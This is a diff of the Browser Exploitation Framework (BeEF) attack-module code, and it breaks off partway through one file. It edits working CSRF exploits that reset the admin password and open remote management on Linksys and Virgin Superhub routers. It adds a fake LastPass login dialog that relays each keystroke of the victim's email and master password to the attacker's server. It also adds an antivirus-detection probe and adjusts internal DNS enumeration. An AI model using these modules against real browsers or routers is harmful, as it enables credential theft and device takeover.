   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(befsr41_iframe);
+    document.body.removeChild(befsr41_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_wrt54g2_csrf/command.js

@@ -5,11 +5,12 @@
 //
 
 beef.execute(function() {
-  var port = '<%= @port %>';
+  var port    = '<%= @port %>';
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
+  var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
       [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
        {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
        {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
@@ -27,9 +28,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g2_iframe);
+    document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_wrt54g_csrf/command.js

@@ -5,31 +5,33 @@
 //
 
 beef.execute(function() {
-  var port = '<%= @port %>';
+  var port    = '<%= @port %>';
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
-      [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
-          {'type':'hidden', 'name':'http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'https_enable', 'value':'0'},
-          {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
-          {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+  var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
+      [
+          {'type':'hidden', 'name':'remote_mgt_https',   'value':'0'} ,
+          {'type':'hidden', 'name':'http_enable',        'value':'1'},
+          {'type':'hidden', 'name':'https_enable',       'value':'0'},
+          {'type':'hidden', 'name':'PasswdModify',       'value':'1'},
+          {'type':'hidden', 'name':'http_passwd',        'value':passwd},
           {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
-          {'type':'hidden', 'name':'_http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'remote_management', 'value':'1'},
-          {'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
-          {'type':'hidden', 'name':'http_wanport', 'value':port},
-          {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
-          {'type':'hidden', 'name':'layout', 'value':'en'}
+          {'type':'hidden', 'name':'_http_enable',       'value':'1'},
+          {'type':'hidden', 'name':'remote_management',  'value':'1'},
+          {'type':'hidden', 'name':'web_wl_filter',      'value':'1'},
+          {'type':'hidden', 'name':'http_wanport',       'value':port},
+          {'type':'hidden', 'name':'upnp_enable',        'value':'1'},
+          {'type':'hidden', 'name':'layout',             'value':'en'}
       ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g_iframe);
+    document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/virgin_superhub_csrf/command.js

@@ -9,30 +9,31 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var passwd  = '<%= @password %>';
 	var port    = '<%= @port %>';
+	var timeout = 15;
 
-	var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
-		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
+	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+		{'type':'hidden', 'name':'NetgearPassword',        'value':passwd},
 		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
-		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+		{'type':'hidden', 'name':'RestoreFactoryNo',       'value':'0x00'}
 	]);
 
-	var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
-		{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+		{'type':'hidden', 'name':'cbPortScanDetection',    'value':''}
 	]);
 
-	var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
-		{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
-		{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+		{'type':'hidden', 'name':'NetgearVMRmEnable',      'value':'0x01'},
+		{'type':'hidden', 'name':'NetgearVMRmPortNumber',  'value':port}
 	]);
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(virgin_superhub_iframe1);
-		document.body.removeChild(virgin_superhub_iframe2);
-		document.body.removeChild(virgin_superhub_iframe3);
+		document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/zenoss_daemon_csrf/command.js

@@ -1,23 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-  var base = '<%= @base %>'; 
-  var service = '<%= @service %>';
-  var action = '<%= @action %>';
-
-  var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
-  zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
-
-  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
-
-  cleanup = function() {
-    document.body.removeChild(zenoss_daemon_iframe);
-  }
-  setTimeout("cleanup()", 15000);
-
-});
-

modules/exploits/zenoss_daemon_csrf/module.rb

@@ -1,60 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-class Zenoss_daemon_csrf < BeEF::Core::Command
-  
-	def self.options
-		return [
-			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
-			{ 'name' => 'service',
-				'type' => 'combobox',
-				'ui_label' => 'Daemon',
-				'store_type' => 'arraystore',
-				'store_fields' => ['service', 'description'],
-				'store_data' => [
-					['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
-					['zopectl', 'zopectl (The Zope open source web application server)'],
-					['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
-					['zenjobs', 'zenjobs (Zenjobs)'],
-					['zenping', 'zenping (ICMP ping status monitoring)'],
-					['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
-					['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
-					['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
-					['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
-					['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
-					['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
-					['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
-					['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
-					['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
-					['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
-					['zenjmx', 'zenjmx (ZenJMX)']
-				],
-				'emptyText' => 'Select a daemon',
-				'valueField' => 'service',
-				'displayField' => 'service', #'description',
-				'mode' => 'local',
-				'autoWidth' => true
-			},
-			{ 'name' => 'action',
-				'type' => 'combobox',
-				'ui_label' => 'Action',
-				'store_type' => 'arraystore',
-				'store_fields' => ['action'],
-				'store_data' => [
-					['Start'],['Stop'],['Restart']
-				],
-				'valueField' => 'action',
-				'displayField' => 'action',
-				'mode' => 'local',
-				'autoWidth' => true
-			}
-		]
-	end
-
-	def post_execute
-		save({'result' => @datastore['result']})
-	end
-
-end

modules/host/detect_bitdefender2012/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    var temp=document.body.innerHTML;
+    var key="netdefender/hui/ndhui.js";
+    if(temp.indexOf(key)>0) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
+    } else {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
+    };
+
+});
+

modules/host/detect_bitdefender2012/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_bitdefender2012:
+            enable: true
+            category: "Host"
+            name: "Detect Bit Defender 2012"
+            description: "This module detect the javascript code automatically included by Bitdefender 2012"
+            authors: ["nbblrr"]
+            target:
+                working: ["ALL"]

modules/host/detect_bitdefender2012/module.rb

@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Detect_bitdefender2012 < BeEF::Core::Command
+
+  def post_execute
+    save({'BitDefender' => @datastore['bitdefender']})
+  end
+
+end

modules/network/detect_soc_nets/command.js

@@ -17,7 +17,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.src = 'https://mail.google.com/mail/photos/static/AD34hIiQyJTs5FhsJ1mhFdK9wx4OZU2AgLNZLBbk2zMHYPUfs-ZzXPLq2s2vdBmgnJ6SoUCeBbFnjRlPUDXw860gsEDSKPrhBJYDgDBCd7g36x2tuBQc0TM?'+ new Date();
+	img.src = 'https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD?'+ new Date();
 	img.id = 'gmailimg';
 	img.setAttribute("attr","start");
 	img.onerror = function() {

modules/network/dns_enumeration/command.js

@@ -9,26 +9,26 @@ beef.execute(function() {
     var dns_list = "<%= @dns_list %>";
     var timeout = parseInt("<%= @timeout %>");
 
-    var cont=0; 
+    var cont=0;
     var port = 900;
     var protocol="http://";
     var hostnames;
 
     if(dns_list!="%default%") {
-        hostnames = dns_list.split(","); 
+        hostnames = dns_list.split(",");
     } else {
         hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml");
     }
-    
+
     function notify() {
         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]);
         check_next();
     }
-    
-    function check_next() { 
+
+    function check_next() {
         cont++;
-        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port); 
-        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); 
+        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port);
+        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000);
     }
 
     function do_resolv(url) {
@@ -42,15 +42,15 @@ beef.execute(function() {
         } else {
             return -1;
         }
-        
+
         xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } };
         xhr.send();
-        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000);
+        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout);
     }
 
     beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded');
     if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) {
-        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); 
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported');
     }
 
 });

modules/social_engineering/fake_lastpass/command.js

@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// Prepare the onmessage event handling
+	var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
+	var eventer = window[eventMethod];
+	var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
+	eventer(messageEvent,function(e) {
+		if (e.data == "KILLFRAME") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Killing Frame');	
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'meta=KILLFRAME');	
+			beef.dom.removeElement('LPIFRAME');
+			return;
+		} else {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + e.data);	
+		}
+	},false);	
+
+	if (beef.browser.isC()) {
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/index.html','id':'LPIFRAME'}, {'width':'375px','height':'415px','position':'fixed','right':'0px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'1px solid white','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages');	
+	} else {
+		// Don't know how NON Chrome browsers look - so just going to pop the FF dialog
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'280px','height':'345px','position':'fixed','left':(($j(window).width()/2)-140)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Non-Chrome IFrame Created .. awaiting messages');	
+	}
+
+	// $j('body').append("<div id='lp_login_dia' style='width:375px; height:415px; position: fixed; right: 0px; top: 0px; z-index: "+beef.dom.getHighestZindex()+1+"; border: 1px solid white; overflow: hidden; display: none'></div>");
+
+	// $j('#lp_login_dia').load(beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/lp/index.html");
+
+
+
+});

modules/social_engineering/fake_lastpass/config.yaml

@@ -5,11 +5,11 @@
 #
 beef:
     module:
-        fake_notification:
+        fake_lastpass:
             enable: true
             category: "Social Engineering"
-            name: "Fake Notification"
-            description: "Displays a fake notification at the top of the screen, similar to those presented in IE."
+            name: "Fake LastPass"
+            description: "Displays a fake LastPass user dialog."
             authors: ["xntrik"]
             target:
                 user_notify: ['ALL']

modules/social_engineering/fake_lastpass/index.html

@@ -0,0 +1,188 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+<style type="text/css">
+body { font-family: Helvetica,Arial;
+color:white;}
+
+#_docwrite_login_small7 { white-space:normal; width:258px !important; display:inline-block; }
+#showvault { vertical-align: top; }
+
+/* General */
+.clear         {clear:both;font-size:0;height:0;line-height:0;overflow:hidden;}
+
+table td       {
+	padding-right:10px;
+	white-space:nowrap;
+}
+
+
+	
+.dropStyle {
+  border:thin solid white;
+background: #919191 !important; /* for non-css3 browsers */
+  background: -webkit-gradient(linear, left top, left bottom, from(#a9a9a9), to(#7a7a7a)); /* for webkit browsers */
+  font-weight: bold;
+  color: #e7e5e5;
+  position:absolute;
+  cursor:default;
+  text-align:left;
+  font-size:12px;
+  z-index:10000;
+  height:120px;
+  overflow:auto;
+  }
+.item {
+}
+.focus {
+background: #0399d4 !important; /* for non-css3 browsers */
+	background: -webkit-gradient(linear, left top, left bottom, from(#04acec), to(#0186ba)) !important; /* for webkit browsers */
+	color: #fff !important;
+	-webkit-border-radius: 0;
+	-moz-border-radius: 0;
+	text-shadow: 0 1px 1px rgba(0, 0, 0, .1);
+	cursor:hand
+}
+
+.item[aria-disabled="true"] {
+  color: grey;
+}
+.offscreen {
+   position: absolute;
+  left: -9000px;
+  width: 0;
+  overflow: hidden;
+}
+
+body { padding:20px 10px 0px 50px; font:13px/150% Helvetica, Arial, Tahoma, sans-serif; }
+
+body{
+	background:url('q3Jrp.png') repeat;
+}
+
+.logintitle{
+font-size:16px; font-weight:bold; 
+text-shadow:1px 1px 2px #858585
+}
+
+/**.css3button { background-image:url(images/menu_btnsmall.png); height:30px; width:95px; line-height:30px; font-size:12px; color:white; text-align:center;
+cursor:hand;
+font-weight:bold;
+text-shadow:1px 1px 2px #858585}
+.css3button:hover { background-image:url(images/menuroll_btnsmall.png); cursor:hand; } **/
+
+.css3button {
+	font-family: Helvetica, Arial, sans-serif; font-weight:bold;
+	font-size: 14px;
+	color: #ffffff;
+	padding: 2px 15px;
+	background: -webkit-linear-gradient(top, rgba(32,188,232,1) 0%,rgba(0,119,232,1) 100%);
+	-webkit-border-radius: 30px;
+	border: 2px solid #ffffff;
+	-webkit-box-shadow:
+		0px 3px 11px rgba(000,000,000,0.5),
+		inset 0px 0px 1px rgba(005,000,004,1);
+	text-shadow:
+		0px -1px 0px rgba(000,000,000,0.2),
+		0px 1px 0px rgba(255,255,255,0.3);
+}
+
+.css3button:hover {
+	cursor:hand;
+	 background:-webkit-gradient(linear, left top, left bottom, color-stop(0%,#158aff), color-stop(44%,#0b7ef1), color-stop(100%,#126eca));
+}
+
+/** text area input with shadow **/
+
+
+.textarea { 
+	-webkit-transition: all 0.30s ease-in-out;
+	padding-left: 7px;
+	width:200px;
+	border: solid 1px #E5E5E5;
+	outline: 0;
+	font: normal 13px/100% Helvetica, Arial, Tahoma, sans-serif;
+	box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px;
+	-moz-box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px;
+	-webkit-box-shadow: inset 1 3px 1 hsla(0,0%,0%,0.1);
+	-webkit-border-radius: 10px;
+	}
+	
+checkbox {
+	padding: 4px;
+	}
+
+
+/** input focus darkening **/
+
+/*
+.textarea:hover, .textarea:focus { 
+	border-color: #C9C9C9; 
+	-webkit-box-shadow: 0px 0px 5px 2px #3d8bff;
+	}
+*/
+
+.glow { 
+	border-color: #C9C9C9; 
+   	-webkit-box-shadow:0 0 1px 3px hsla(210,100%,50%,0.8), 0 1px 0 hsla(0,0%,100%,0.3);
+
+	}
+
+
+.form label { 
+	margin-left: 10px; 
+	color: #999999;
+	font-weight:bold; 
+	}
+
+a:link, a:active {
+	font-weight : bold;
+	font-size : 12px;
+	font-family : helvetica;
+	color :white;
+	text-decoration : none;
+	padding-left:10px
+	}
+	
+	a:hover {
+		font-weight : bold;
+		font-size : 12px;
+		font-family : helvetica;
+		color : #09F;
+		text-decoration : none;
+		}
+		
+</style>
+<script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+});
+
+</script>
+</head><body><img src='lpwhite_small.png'/><p><div id="reprompttext" style="display: none;"><br><span id="_docwrite_login_small1"></span><br><br></div><div id="nodbtext" style="display: none; color: red;"><br><b><span id="_docwrite_login_small2"></span></b><br><br></div>
+<form id='f'><table><tr><td class='logintitle'><span id="_docwrite_login_small3">Email</span></td></tr><tr><td><input type='text' id='u' class='textarea' name='username' value=''/>&nbsp;&nbsp;<img id="deleteicon" src="xsmall.png" valign="middle"></td></tr><tr><td class='logintitle'><span id="_docwrite_login_small4">Password</span></td></tr><tr><td><input type='password' class='textarea' id='p' name='password'/></td></tr><tr id="rememberemailrow"><td><input type='checkbox' name='rememberemail' id='rememberemail'/>&nbsp;&nbsp;<label for="rememberemail"><span id="_docwrite_login_small5">Remember Email</span></label></td></tr><tr id="rememberpasswordrow"><td><input type='checkbox' name='rememberpassword' id='rememberpassword'/>&nbsp;&nbsp;<label for="rememberpassword"><span id="_docwrite_login_small6">Remember Password</span></label></td></tr><tr id="showvaultrow"><td><input type='checkbox' name='showvault' id='showvault'/>&nbsp;&nbsp;<label for="showvault"><span id="_docwrite_login_small7">Show Vault After Login</span></label></td></tr><tr id="donotrepromptforrow" style="display: none;"><td>&nbsp;</td><td><input type='checkbox' name='donotrepromptfor' id='donotrepromptfor'/>&nbsp;&nbsp;<label for="donotrepromptfor"><span id="_docwrite_login_small8"></span></label><select id="donotrepromptforsecs"><option value="0"></option><option value="30" id="_docwrite_login_small9"></option><option value="60" id="_docwrite_login_small10"></option><option value="300" id="_docwrite_login_small11"></option><option value="900" id="_docwrite_login_small12"></option><option value="1800" id="_docwrite_login_small13"></option><option value="3600" id="_docwrite_login_small14"></option><option value="10800" id="_docwrite_login_small15"></option><option value="21600" id="_docwrite_login_small16"></option><option value="43200" id="_docwrite_login_small17"></option><option value="86400" id="_docwrite_login_small18"></option></select></td></tr><div id='btnrow' class='btnrow'><table class='buttontable'><tr><td><div class='css3button' id='login'/><span id="_docwrite_login_small19">Login</span></div></div></td><td><div class='css3button' id='cancel'/><span id="_docwrite_login_small20">Cancel</span></div></td></tr></table></div></td></table></table></form><div id='links'><span id="forgotcontainer"><img src="key_small.png"><a id='forgot' href='#'><span id="_docwrite_login_small21">I forgot my password, Help</span></a><br/></span><span id="screenkeyboardcontainer"><img src="screenkeyboard.png"><a id='screenkeyboard' href='#'><span id="_docwrite_login_small22">Screen Keyboard</span></a><br/></span><span id="createaccountcontainer"><img src="create_small.png"><a id='createaccount' href='#'><span id="_docwrite_login_small23">Create Account</span></a><br/></span></div><div id='error'></div>
+
+</body></html>

modules/social_engineering/fake_lastpass/indexFF.html

@@ -0,0 +1,72 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+<style type="text/css">
+body { font-family: Helvetica,Arial;
+color:-moz-DialogText;
+background-color: #ededed;
+font: message-box;
+}
+
+
+</style>
+<script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#disableffpwd').change(function() {
+		parent.postMessage('Disable FF Password Management changed to: ' + $('disableffpwd').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+});
+
+</script>
+</head><body>
+
+<div style="text-align: center; padding-bottom:5px"><img src="icon.png" /></div>
+<form>
+<div style="text-align: center">
+	<div style="text-align: left; padding-bottom:5px">Email</div>
+	<div style="text-align: left; padding-bottom:5px"><input type="text" style="width:245px;height:20px" id='u' /></div>
+	<div style="text-align: left; padding-bottom:5px">Master Password</div>
+	<div style="text-align: left; padding-bottom:5px"><input type="password" style="width:245px;height:20px" id='p' /></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
+	<div style="text-align: left; padding-bottom:10px"><input type="checkbox" checked="checked" id='disableffpwd'>Disable Insecure Firefox Password Management</input></div>
+</div>
+
+<div style="text-align:center; padding-bottom:5px">
+	<div style="text-align:left; padding-bottom: 5px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
+	<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='screenkeyboard'>Screen Keyboard</a> &nbsp;&nbsp; <a href="#" style="text-decoration: none" id='createaccount'>Create an Account</a></div>
+</div>
+
+<div style="text-align:right">
+	<input type="button" value="Cancel" style="width:77px; height:21px" id='cancel' /> <input type="button" value="Login" style="width:77px; height:21px" id='login' />
+</div>
+</form>
+
+
+</body></html>

modules/social_engineering/fake_lastpass/module.rb

@@ -0,0 +1,43 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_lastpass < BeEF::Core::Command
+  
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/index.html','/lp/index','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/indexFF.html','/lp/indexFF','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/key_small.png','/lp/key_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/lpwhite_small.png','/lp/lpwhite_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/q3Jrp.png','/lp/q3Jrp','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/screenkeyboard.png','/lp/screenkeyboard','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/xsmall.png','/lp/xsmall','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/create_small.png','/lp/create_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/icon.png','/lp/icon','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js','/lp/jquery','js')
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    if (@datastore['meta'] == "KILLFRAME") 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/index.html')
